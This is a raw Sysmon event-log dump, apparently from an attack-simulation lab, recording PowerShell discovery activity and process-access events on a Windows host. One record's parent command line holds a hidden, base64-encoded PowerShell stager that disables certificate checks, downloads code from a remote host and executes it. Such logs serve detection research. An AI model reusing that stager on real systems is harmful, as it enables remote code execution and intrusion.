15:09:47.883{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe Get-NetTcpConnectionC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-753B-613B-83B4-03000000C801}1928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-NetTcpConnection 10341000x800000000000000035344385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-753B-613B-83B4-03000000C801}1928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-753B-613B-83B4-03000000C801}1928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.869{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-753B-613B-83B4-03000000C801}1928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035344378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.877{B81B27B7-753B-613B-83B4-03000000C801}1928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-NetTcpConnectionC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035344377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:47.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4A37215B98C9D100B86A4E7771C03A,SHA256=B47752B22549F19F785D196D706E847B8155535FA176F7669EDE45B22BD13C75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4478D5E840E5909C155E6E40CF968608,SHA256=99F10F673A5FAFC7D99CC4ACF448CF7A8E1C2A5D3DAC4B4FB0466823691AAE4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FDE8044100487AEAB5B54665C12A6AC1,SHA256=C87A73F1D4CA49235986FE36D1D2A80471D82BF181E43ED272E58403E675627E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.901{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A8A3156BD6D6242C19840CAFFF57AD,SHA256=0CD58D963700A70F40CE247469702B03A0CA07217DB7396E757A1739B40FB141,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0140DDC25AC051A4D6BCDE8CF6582B77,SHA256=272F7785F32B620C9025CCB9C56AD7EBDCBC8472FB071BF0E7EB40194AE7D41C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.837{B81B27B7-753B-613B-84B4-03000000C801}5688ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0BA8C46AC497B10E9D0414A26802DDBF,SHA256=5DEA275B64E401A6994A89E0B5ECEB9B67C4C7FFBE442AC485130B16ED148004,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.768{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6BE43C4DFE8AE42BA5C8FBC03F5DA60,SHA256=C75F3FB753138A5A18273EAB7FE0272F925941005F5DF569DC948CFD5120ACDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.583{B81B27B7-4013-611D-1600-00000000C801}11965356C:\Windows\system32\svchost.exe{B81B27B7-753C-613B-85B4-03000000C801}5912C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.583{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-753C-613B-85B4-03000000C801}5912C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.568{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-753C-613B-85B4-03000000C801}5912C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.568{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-753C-613B-85B4-03000000C801}5912C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.537{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.537{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.537{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=81AD76A8CF2A62F2F95C5B0910A48619,SHA256=0D0D46403F412B78D78DF143CBC1DD51698D1FEB05BA81D224AAF104739C58DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B546C3F66990BEFC17C7DDDEB1002B62,SHA256=5F3DD1E165CE9800B1EBE2F2FFDF093051C4B744BB2860CF7173C409568A4DDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.054{B81B27B7-4013-611D-1600-00000000C801}11965460C:\Windows\system32\svchost.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.054{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.007{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.